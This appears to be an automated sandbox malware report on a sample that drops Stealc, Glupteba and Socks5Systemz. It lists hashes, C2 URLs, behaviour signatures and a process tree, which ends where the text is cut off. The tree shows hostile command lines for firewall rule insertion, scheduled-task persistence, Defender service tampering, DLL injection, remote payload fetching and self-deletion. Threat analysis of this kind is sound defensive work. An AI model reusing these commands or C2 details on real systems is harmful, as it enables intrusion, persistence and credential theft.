Resubmissions

12-03-2024 13:07

240312-qcwt3ahe5t 10

12-03-2024 07:52

240312-jqvetsdh93 10

Analysis

  • max time kernel
    862s
  • max time network
    862s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    12-03-2024 13:07

General

  • Target

    file.exe

  • Size

    39KB

  • MD5

    699e79d0f4a7586ffe53d0dabc5c0a5a

  • SHA1

    7178ab85fe6190259b64846c76af01b8da5b0cd4

  • SHA256

    b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca

  • SHA512

    56bab1c5eaf18bef213da76f8c5ccdc15ce6fd59d93cfff77604378a1f474f2045d975ebd14563f712c9054f0a6b8e35c42f311322bca192d1f68bf5684aa526

  • SSDEEP

    768:sRyIN4srhwS4CGlB7+zM2WiWYiP8gzBggIfiN5SNUJ:2yIN42h6n2rWiKPPzBm9Ns

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.145

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

socks5systemz

C2

http://bghmfep.com/search/?q=67e28dd86d58f02d130da81f7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978a571ea771795af8e05c644db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608fff13c4e79c993d

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • Socks5Systemz

    Socks5Systemz is a botnet written in C++.

  • Stealc

    Stealc is an infostealer written in C++.

  • Windows security bypass 2 TTPs 7 IoCs
  • Contacts a large (4190) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 15 IoCs
  • Executes dropped EXE 49 IoCs
  • Loads dropped DLL 29 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 8 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 5 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:17632
      • C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe
        "C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:22060
        • C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp" /SL5="$502CA,1807550,56832,C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:21880
          • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
            "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
            5⤵
            • Executes dropped EXE
            PID:4320
          • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
            "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
            5⤵
            • Executes dropped EXE
            PID:2184
      • C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
        "C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:10796
        • C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
          "C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:19500
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:19904
          • C:\Windows\System32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:2496
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:4416
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6152
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:17488
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:20712
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                6⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:21576
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:5448
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:12268
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:12156
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:10676
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  PID:22252
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:21464
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:21240
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:9936
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        • Suspicious use of AdjustPrivilegeToken
                        PID:9824
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4676
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                    6⤵
                    • Executes dropped EXE
                    PID:6200
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6284
                  • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    6⤵
                    • Executes dropped EXE
                    PID:8040
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:8112
                  • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1888
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:14436
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5148
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:13948
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:9424
            • C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe
              "C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3868
              • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:5968
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                  5⤵
                    PID:4320
                    • C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                      "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of AdjustPrivilegeToken
                      PID:20248
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                        7⤵
                          PID:20056
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 2.2.2.2 -n 1 -w 3000
                            8⤵
                            • Runs ping.exe
                            PID:1852
                  • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:9488
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:11988
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        6⤵
                          PID:2248
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                          6⤵
                          • Creates scheduled task(s)
                          PID:5448
                  • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                    "C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --silent --allusers=0
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Enumerates connected drives
                    • Modifies system certificate store
                    • Suspicious use of WriteProcessMemory
                    PID:12036
                    • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                      C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6db421c8,0x6db421d4,0x6db421e0
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13676
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe" --version
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:14428
                    • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                      "C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=12036 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240312130803" --session-guid=52c5fd4c-d793-4139-a592-fdb3e1102c9d --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5004000000000000
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Enumerates connected drives
                      • Suspicious use of WriteProcessMemory
                      PID:14960
                      • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                        C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2cc,0x6d0321c8,0x6d0321d4,0x6d0321e0
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:15204
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                      4⤵
                      • Executes dropped EXE
                      PID:6864
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --version
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:11556
                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x200040,0x20004c,0x200058
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:15312
                  • C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe
                    "C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:10020
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:9812
                    • C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe
                      "C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"
                      4⤵
                      • Executes dropped EXE
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      PID:20496
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:7828
                  • C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe
                    "C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:11644
                    • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      4⤵
                      • Executes dropped EXE
                      PID:11796
                  • C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe
                    "C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:13620
                    • C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp" /SL5="$404DC,1807550,56832,C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13736
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                        5⤵
                        • Executes dropped EXE
                        PID:13360
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                        5⤵
                        • Executes dropped EXE
                        PID:13392
                  • C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe
                    "C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe" --silent --allusers=0
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Enumerates connected drives
                    PID:13668
                    • C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe
                      C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x69bc21c8,0x69bc21d4,0x69bc21e0
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13716
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe" --version
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13848
                  • C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe
                    "C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4160
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2372
                    • C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe
                      "C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"
                      4⤵
                      • Executes dropped EXE
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • Modifies data under HKEY_USERS
                      PID:6012
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5240
                  • C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe
                    "C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:4700
                    • C:\Users\Admin\AppData\Local\Temp\is-QR3BA.tmp\bhJRGCgBFLmbnysHYxZIy2UZ.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-QR3BA.tmp\bhJRGCgBFLmbnysHYxZIy2UZ.tmp" /SL5="$704E8,1807550,56832,C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2780
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                        5⤵
                        • Executes dropped EXE
                        PID:12044
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                        5⤵
                        • Executes dropped EXE
                        PID:12612
                  • C:\Users\Admin\Pictures\kL5MaQu7jAAGIFgNQb6ujSPo.exe
                    "C:\Users\Admin\Pictures\kL5MaQu7jAAGIFgNQb6ujSPo.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:5892
                    • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      4⤵
                      • Executes dropped EXE
                      PID:1284
                    • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:11600
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                        5⤵
                          PID:11752
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 1251
                            6⤵
                              PID:11812
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                              6⤵
                              • Creates scheduled task(s)
                              PID:2552
                      • C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
                        "C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe" --silent --allusers=0
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        PID:7892
                        • C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
